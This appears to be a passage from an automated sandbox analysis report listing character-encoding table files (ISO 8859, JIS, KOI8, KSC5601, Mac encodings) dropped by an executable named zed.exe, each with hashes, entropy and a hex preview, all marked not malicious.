                                                                                                                                                                                                                                            Preview:# Encoding file: iso8859-2, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A0010402D8014100A4013D015A00A700A80160015E0164017900AD017D017B..00B0010502DB014200B4013E015B02C700B80161015F0165017A02DD017E017C..015400C100C2010200C40139010600C7010C00C9011800CB011A00CD00CE010E..01100143014700D300D4015000D600D70158016E00DA017000DC00DD016200DF..015500E100E2010300
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1114
                                                                                                                                                                                                                                            Entropy (8bit):3.2507537230559977
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:tHVBUlJvRj7SOVbusZhAMiZyi77qimw2g0kgTJMkFtoD:tMlBVnrAMiwMmTo0kgTJDoD
                                                                                                                                                                                                                                            MD5:CBD0B9CDCD9BC3D5F2429A760CF98D2F
                                                                                                                                                                                                                                            SHA1:6DEF0343E0357E0671002A5D2F0BFC2E00C8BCF9
                                                                                                                                                                                                                                            SHA-256:1F51E7BDA64D466C16FEE9A120BBE3353A10CEB9DAB119FFA326779BA78D8C5D
                                                                                                                                                                                                                                            SHA-512:88DB6D23B53F4A78133C794ED42FA3F29A4ABAD35DE4B022040FA187AA59B00664CC13F47AFF4507D72F4CB2166F026144213EE760AB0FD67CDD2FA5906F434A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: iso8859-3, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A0012602D800A300A40000012400A700A80130015E011E013400AD0000017B..00B0012700B200B300B400B5012500B700B80131015F011F013500BD0000017C..00C000C100C2000000C4010A010800C700C800C900CA00CB00CC00CD00CE00CF..000000D100D200D300D4012000D600D7011C00D900DA00DB00DC016C015C00DF..00E000E100E2000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1114
                                                                                                                                                                                                                                            Entropy (8bit):3.3413832766873073
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:KHVBUlJvRj7SOVbusZhAMiZyi77qimX4AsD/njR7Ky8hA:KMlBVnrAMiwMmTXBs3EyuA
                                                                                                                                                                                                                                            MD5:8B620EDECAC2DF15A024C2CE15FB64A5
                                                                                                                                                                                                                                            SHA1:65C5EE5D08964E37393E6A78ABA0DB16D51240E2
                                                                                                                                                                                                                                            SHA-256:66B3CF994F0B5E0103D13E812958320AFB555C91E3F81B579D4CBF231E6A0805
                                                                                                                                                                                                                                            SHA-512:93391325405D3AEA0A913F5EA8EA0391920D10F234C26AB1DA70992702889A3AF7B85E11A1FCA554690942B238CE313DD460798E59C5B1F4069036E7B0F24F44
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: iso8859-4, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A001040138015600A40128013B00A700A8016001120122016600AD017D00AF..00B0010502DB015700B40129013C02C700B80161011301230167014A017E014B..010000C100C200C300C400C500C6012E010C00C9011800CB011600CD00CE012A..01100145014C013600D400D500D600D700D8017200DA00DB00DC0168016A00DF..010100E100E200E300
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1114
                                                                                                                                                                                                                                            Entropy (8bit):3.342721205983665
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:zHVBUlJvRj7SOVbusZhAMiZyi77qimq5+SAJlz9aRme3cJbx:zMlBVnrAMiwMmTqeYnsJbx
                                                                                                                                                                                                                                            MD5:6FBEFDC3DEC612B7B2CC903D8C53F45B
                                                                                                                                                                                                                                            SHA1:14EC3C166DC411149C32C262DBE8E327F6186669
                                                                                                                                                                                                                                            SHA-256:3130BF26DA0C840C1E02203A90C3B1C38966FB203130E2FBB3DD7CB3865A3539
                                                                                                                                                                                                                                            SHA-512:F3F15AD8B6C9D9B4C9C994FE3235B4463E59BE7DCE79CF3F7AA77905D6F4DC2C4AABB79B440767DB13D357B13F09EA34983FCA7BC92D0AFA15FB6CBEDDD04E38
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: iso8859-5, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A0040104020403040404050406040704080409040A040B040C00AD040E040F..0410041104120413041404150416041704180419041A041B041C041D041E041F..0420042104220423042404250426042704280429042A042B042C042D042E042F..0430043104320433043404350436043704380439043A043B043C043D043E043F..044004410442044304
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1114
                                                                                                                                                                                                                                            Entropy (8bit):2.992219341429816
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:YHVBUlJvRj7SOVbusZhAMiZyi77qimEZjyG/KE:YMlBVnrAMiwMmTEs6KE
                                                                                                                                                                                                                                            MD5:52F025D943A45EE840D9C3DFD06E4D79
                                                                                                                                                                                                                                            SHA1:571EA14B49FA6150BFD2ABA79E52799955D9FA10
                                                                                                                                                                                                                                            SHA-256:CB71909BF01A3A7A4C7396359DA06D206B58A42AD68192CE37169D6640D46E13
                                                                                                                                                                                                                                            SHA-512:77FF9DC785A63CA59A7D58BB25C7D2C16F364E525F9B939177385EF80F7DE37734C8774F1BC829CF0270FD66257A4D31689654C8037DB0A86A0291FFDE637B90
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: iso8859-6, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A000000000000000A40000000000000000000000000000060C00AD00000000..00000000000000000000000000000000000000000000061B000000000000061F..0000062106220623062406250626062706280629062A062B062C062D062E062F..0630063106320633063406350636063706380639063A00000000000000000000..064006410642064306
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1114
                                                                                                                                                                                                                                            Entropy (8bit):3.393893260854861
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:TMyHVBUlJvRj7SOVbusZhAMiZyi77qim2OBHK9QQSqiWeIDDdn:TlMlBVnrAMiwMmT1hKyQSqiWeIVn
                                                                                                                                                                                                                                            MD5:4BFB0A35D971A9D4C5EA8D8099E93C37
                                                                                                                                                                                                                                            SHA1:8FED2CBB1343E5B4442748242B5F89A76110592D
                                                                                                                                                                                                                                            SHA-256:76F6BC85FC9CB89BC3F94D36275AB23C740BA17FD36EC8907479DA3A885415EA
                                                                                                                                                                                                                                            SHA-512:C9CE1E9EA57A1DEF62BBC60A115C06325C6EE8F92021695459E1ADAF1193A559BC5F0229191BFC2E344296DC137583ED4A9A61A65890F99F4CF97B3864C7AF0F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: iso8859-7, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A02018201900A320AC20AF00A600A700A800A9037A00AB00AC00AD00002015..00B000B100B200B303840385038600B703880389038A00BB038C00BD038E038F..0390039103920393039403950396039703980399039A039B039C039D039E039F..03A003A1000003A303A403A503A603A703A803A903AA03AB03AC03AD03AE03AF..03B003B103B203B303
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1114
                                                                                                                                                                                                                                            Entropy (8bit):3.0494739426493567
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:uHVBUlJvRj7SOVbusZhAMiZyi77qimieGlnvs26Kcv:uMlBVnrAMiwMmTirv87
                                                                                                                                                                                                                                            MD5:5F69EAF54E7A1E8AC81C9E734DBE90D8
                                                                                                                                                                                                                                            SHA1:BA509C88A4FC03922EF5CDC887FAA7B594A9BC5A
                                                                                                                                                                                                                                            SHA-256:865E3665743B5FABA3E1AD6AA55515A666BD05DA6266879D9B66C98905DAFF3C
                                                                                                                                                                                                                                            SHA-512:D9924FBE59CB571AF721CA602DBE58CAD0D9310610EDF544F8FC0FBF3D1CE4E99597D0198E4E7C802107012786346FE4C1B9C6C3A76D5F60B9A83981B0EDA24D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: iso8859-8, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A0000000A200A300A400A500A600A700A800A900D700AB00AC00AD00AE00AF..00B000B100B200B300B400B500B600B700B800B900F700BB00BC00BD00BE0000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000002017..05D005D105D205D305
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1114
                                                                                                                                                                                                                                            Entropy (8bit):3.2591070910715714
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:XHVBUlJvRj7SOVbusZhAMiZyi77qimmvGNNlkBSMH+tA/b:XMlBVnrAMiwMmTmokgzAD
                                                                                                                                                                                                                                            MD5:0B99E605E73B7D8DEFD8D643F5729748
                                                                                                                                                                                                                                            SHA1:F30E7CCBCD9C539126E8D6CA0886E4B2BD54E05D
                                                                                                                                                                                                                                            SHA-256:CF51E867DDE2F19553D98FEEC45A075C4B4F480FB1EDADB3D8DAD1EBEA9299F3
                                                                                                                                                                                                                                            SHA-512:DA0487CD7F2143195E80697C17FFDB61AFD464C888DDF84813B2B5D1BAB24D96466DA7A7F77C8E4A9D0D53F34D72928923380AFC1B92A96C0A3BFF46006A4E19
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: iso8859-9, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A000A100A200A300A400A500A600A700A800A900AA00AB00AC00AD00AE00AF..00B000B100B200B300B400B500B600B700B800B900BA00BB00BC00BD00BE00BF..00C000C100C200C300C400C500C600C700C800C900CA00CB00CC00CD00CE00CF..011E00D100D200D300D400D500D600D700D800D900DA00DB00DC0130015E00DF..00E000E100E200E300
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1112
                                                                                                                                                                                                                                            Entropy (8bit):3.2708615484795676
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:zBHVBUlJvRj7SOVbusZhAMiZyi77qN8VmKfkiJt0RMFS:zBMlBVnrAMiwMmNPYPFS
                                                                                                                                                                                                                                            MD5:4E21F24F8D9CC5DF16B29CACD997AC69
                                                                                                                                                                                                                                            SHA1:064E723EFB82EF1C303E5267496304288821E404
                                                                                                                                                                                                                                            SHA-256:61B14A7C312366F79BB45F02C6B7EE362E6F51CBAD5E479E563C7F7E785DB654
                                                                                                                                                                                                                                            SHA-512:AF8FAEB47EFB51F2537139F7C4254ABED119E477FD2B5E83B90B7A903B43C4E02DDF43A7DDB044A0A9601E9F9ADE91B02EE7C0EC87FF5DDCF9951B9601A90435
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: jis0201, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D203E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000FF61FF62FF63FF64FF65FF66FF67FF68FF69FF6AFF6BFF6CFF6DFF6EFF6F..FF70FF71FF72FF73FF74FF75FF76FF77FF78FF79FF7AFF7BFF7CFF7DFF7EFF7F..FF80FF81FF82FF83FF84FF85FF86FF87FF88FF89FF8AFF8BFF8CFF8DFF8EFF8F..FF90FF91FF92FF93FF94FF95FF96FF97FF98FF99FF9AFF9BFF9CFF9DFF9EFF9F..00000000000000000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):81772
                                                                                                                                                                                                                                            Entropy (8bit):2.3571626869060776
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:AigXM6CwL/9pV7Hl6+Yko9gZxErA3/MS/8xqg8:AZ/tp1Hl2KZxUfr8
                                                                                                                                                                                                                                            MD5:F0661E22C7455994AA1F6EC1EDA401B4
                                                                                                                                                                                                                                            SHA1:928B2AC46A9FDE61A81F56BE225E6138B40C22E5
                                                                                                                                                                                                                                            SHA-256:F6B1C6AC5F5FC4E990A7A1AAC16A406012040936431BEFE7D2B6CD1DA9E422C4
                                                                                                                                                                                                                                            SHA-512:917CC58678A9E9F5CBE860D30828846ABA4EA8CDFAB7DD1AE6A66C47ECBB85CF67DD97BC3E6F95341DD30F4E757B2CEA571708D5B4CED18A29F19904C3138AE0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: jis0208, double-byte..D..2129 0 77..21..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000300030013002FF0CFF0E30FBFF1AFF1BFF1FFF01309B309C00B4FF4000A8..FF3EFFE3FF3F30FD30FE309D309E30034EDD30053006300730FC20152010FF0F..FF3C301C2016FF5C2026202520182019201C201DFF08FF0930143015FF3BFF3D..FF5BFF5D30083009300A300B300C300D300E300F30103011FF0B221200B100D7..00F7FF1D2260FF1CFF1E22662267221E22342642264000B0203220332103FFE5..FF0400A200A3FF05FF03FF06FF0AFF2000A72606260525CB25CF25CE25C70000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):72133
                                                                                                                                                                                                                                            Entropy (8bit):2.3455261548208055
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:9F/D7CH2puD5CdzU3nAkP5dHn7s391fmOarFaVQ:H/D7CHbozU3nAk3H7sXm3FgQ
                                                                                                                                                                                                                                            MD5:07CE2C135BE17DBAFA558AA5949A53DB
                                                                                                                                                                                                                                            SHA1:5D9DBEFCCB44E76C1A4E61360C6FCED8DCC8EF4D
                                                                                                                                                                                                                                            SHA-256:785CFC5F5D9CB06DB8061730AB0016A0F70D0B59F6787D2A3CBB8D5779C99706
                                                                                                                                                                                                                                            SHA-512:E954D7198D58ACEDEB4C8E5F466107767C3DA43763A5F6CDDFCF567226F9B22B4C2DE27564F28CD125D7F1BA7CB9C6DE6DEC4065EC2676572C793BE458FDDD9D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: jis0212, double-byte..D..2244 0 68..22..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..00000000000000000000000000000000000000000000000000000000000002D8..02C700B802D902DD00AF02DB02DA007E03840385000000000000000000000000..0000000000A100A600BF00000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000BA00AA00A900AE2122..00A4211600000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1111
                                                                                                                                                                                                                                            Entropy (8bit):3.531149521168141
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:KcJ5mHVBUlJvRj7SOVbusZhAMiZyi77qpSzIa9qVRS3YcEchJh3MAxSl:KmmMlBVnrAMiwMmAzIxVgBE6cAxQ
                                                                                                                                                                                                                                            MD5:96F54CC639ACA8E466FB8058144C9350
                                                                                                                                                                                                                                            SHA1:0B9530D6080F2BAACABD5AA0D48BFF316FCCEF64
                                                                                                                                                                                                                                            SHA-256:0E43244BFC4F33FACB844B9E00270A1A4C24DC59B8A9B95104E2D788BB2F59FD
                                                                                                                                                                                                                                            SHA-512:5B7859325E5E34C9D4558B1198795BB9C6A8EF783EB97193EA80BA76C38AFE9BDD1B526B77401DF5456B7A0E85E942191FFD4B4F2B9F0C8168A7093EE452802E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: koi8-r, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..25002502250C251025142518251C2524252C2534253C258025842588258C2590..259125922593232025A02219221A22482264226500A0232100B000B200B700F7..25502551255204512553255425552556255725582559255A255B255C255D255E..255F25602561040125622563256425652566256725682569256A256B256C00A9..044E0430043104460434043504440433044504380439043A043B043C043D043E..043F044F044004410442044304360432044C044B04370448044D04490447044A..042E04100411042604140
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1111
                                                                                                                                                                                                                                            Entropy (8bit):3.5076564572101714
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:K+HVBUlJvRj7SOVbusZhAMiZyi77qpSzIaU3dmVRS3YcEchJh3MAxSl:K+MlBVnrAMiwMmAzI/EVgBE6cAxQ
                                                                                                                                                                                                                                            MD5:4B755EF2288DFC4009759F8935479D68
                                                                                                                                                                                                                                            SHA1:C3BDF0D9DF316DE8919DAA4329275C5AA81D61B4
                                                                                                                                                                                                                                            SHA-256:ED04D5B977B8C8944D8760B713FF061292DA5634BCBB67CDFB1C3A6FF5378C81
                                                                                                                                                                                                                                            SHA-512:3F1E1CC47327054FB9C54157ED10514230F10BFCD4BD9FDAFA02D7B238137DC7442CA2661B0739D8EEA3181E187D3B639A2C8118A0DE272C96000908121B6CFB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: koi8-u, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..25002502250C251025142518251C2524252C2534253C258025842588258C2590..259125922593232025A02219221A22482264226500A0232100B000B200B700F7..25502551255204510454255404560457255725582559255A255B0491255D255E..255F25602561040104032563040604072566256725682569256A0490256C00A9..044E0430043104460434043504440433044504380439043A043B043C043D043E..043F044F044004410442044304360432044C044B04370448044D04490447044A..042E04100411042604140
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):94393
                                                                                                                                                                                                                                            Entropy (8bit):2.4104200953565513
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:XbjO7Uw6uKdosXRxps9a+ut/BmZPwkpT9A0T03o:XfO4ZBRxpV+4wPwKloo
                                                                                                                                                                                                                                            MD5:366C09E4A4CC10006E593F5B3F3461D7
                                                                                                                                                                                                                                            SHA1:A0DABFBEEB66E26FB342844EA41772D7A1D19C24
                                                                                                                                                                                                                                            SHA-256:9B27FE7E7054F36E279993F19E52E18AC03360D117AE80C42B4E984A97C590AA
                                                                                                                                                                                                                                            SHA-512:670F32D698C7992038E736D3AD40098D8589C0C5A1379E32A0F02A02FAF251B1312CAD131DDADC3F80B23A3821A91689F2E310309028BDDDF227D532EB505A20
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: ksc5601, double-byte..D..233F 0 89..21..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000030003001300200B72025202600A8300300AD20152225FF3C223C20182019..201C201D3014301530083009300A300B300C300D300E300F3010301100B100D7..00F7226022642265221E223400B0203220332103212BFFE0FFE1FFE526422640..222022A52312220222072261225200A7203B2606260525CB25CF25CE25C725C6..25A125A025B325B225BD25BC219221902191219321943013226A226B221A223D..221D2235222B222C2208220B2286228722822283222A222922272228FFE20000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1116
                                                                                                                                                                                                                                            Entropy (8bit):3.4295694929963667
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:8jHVBUlJvRj7SOVbusZhAMiZyi77qHVPJSf2FcVDu1LEe4qPPMl2J89:8jMlBVnrAMiwMmHEmJ4IMgi9
                                                                                                                                                                                                                                            MD5:10850BCFB943318284D6191494EBD7D5
                                                                                                                                                                                                                                            SHA1:237D5DDF7969A422991F17021244D13A2BB0DE92
                                                                                                                                                                                                                                            SHA-256:81ECA6840B87F2DEF9FCDD171A55C2D71A49386D88401CE927AE57D7DDD7AAAA
                                                                                                                                                                                                                                            SHA-512:D797781C228B70D2D83DB8ABA08F840CE49846C9473CC89A2E316900D9E08A63142E68AD9ABBB2EF67BF9F1D392772FAB36CCC09632022A1437AE27C11F2284F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: macCentEuro, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C40100010100C9010400D600DC00E10105010C00E4010D0106010700E90179..017A010E00ED010F01120113011600F3011700F400F600F500FA011A011B00FC..202000B0011800A300A7202200B600DF00AE00A92122011900A822600123012E..012F012A22642265012B0136220222110142013B013C013D013E0139013A0145..0146014300AC221A01440147220600AB00BB202600A00148015000D50151014C..20132014201C201D2018201900F725CA014D0154015501582039203A01590156..01570160201A201E
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1116
                                                                                                                                                                                                                                            Entropy (8bit):3.3992482002374516
                                                                                                                                                                                                                                            Encrypted:false
